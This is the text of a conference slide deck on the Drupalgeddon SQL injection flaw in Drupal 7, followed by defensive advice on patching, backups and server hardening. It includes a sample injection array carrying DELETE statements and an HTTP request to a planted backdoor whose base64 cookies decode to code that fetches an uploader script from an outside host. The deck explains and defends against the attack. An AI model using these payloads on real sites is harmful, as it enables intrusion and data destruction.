I Survived Drupalgeddon
I'm Matt Korostoff
I work for FFW
(and you should too)
Some
Background
The Problem
A normal query
<?php
//A normal database query
$nid = 123;
db_query(
"SELECT title FROM {node} WHERE nid = :nids",
array(':nid' => $nid)
);A normal query, with multiple arguments
<?php
$nids = array(123, 456, 489);
db_query(
"SELECT title FROM {node} WHERE nid IN (:nids)",
array(':nid' => $nids)
);A normal query, with multiple arguments, expanded
<?php
$nids = array(123, 456, 489);
db_query(
"SELECT title FROM {node} WHERE nid IN (:nids_0, :nids_1, :nids_2)",
array(':nids_0, :nids_1, :nids_2' => $nid)
);
A malicious query
<?php
$nids = array(
";DELETE FROM node;" => 123,
";DELETE FROM users;" => 456,
";DELETE FROM system;" => 489
);
db_query(
"SELECT title FROM {node} WHERE nid IN (:nids)",
array(':nid' => $nids)
);
Hacking time!
We Will:
-
Inject SQL
-
Execute Code
-
Upload files
Step 1.
Insert a row in menu_router
Step 2.
Get arbitrary code execution
Using Backdoor.php
GET /modules/poll/backdoor.php HTTP/1.1
Host: exploited.com
Cookie: Kcqf3=base64_decode; Kcqf2=cHJlZ19yZXBsYWNl; Kcqf1=ZmlsZV9nZXRfY29udGVudHMoIm1hdHRrb3Jvc3RvZmYuY29tL3VwbG9hZGVyLnBocCIp
Step 3.
Get file upload access
Defending
Your
Site
Drupal 7.32+
Drupal 8-beta2+
Set proper file permissions
Host with professionals
Acquia
Pantheon
platform.sh
Black Mesh
Take AUTOMATED nightly backups
#Backup database
0 2 * * * drush @yoursite sql-dump > /path/to/$(date +\%Y\%m\%d\%H\%M\%S).sqlStore your code in version control
Make sure cron is running
* */2 * * * drush @yoursite cronUpgrade to php 5.5+
Automate security patchesÂ
#Without git
0 */2 * * * drush @yoursite up -y --security
#With git
0 */2 * * * cd /path/to/your/repository/ &&
drush up --security -y &&
git commit -am 'Automatic security update' &&
git push origin masterDrop post traffic in Varnish
#VCL
if (req.request == "POST") {
error 404 "No";
}
#.htaccess
Deny from all
Allow from 123.123.123.123Was this really "Drupalgeddon"?
Thanks!
I Survived Drupalgeddon
By Matt Korostoff
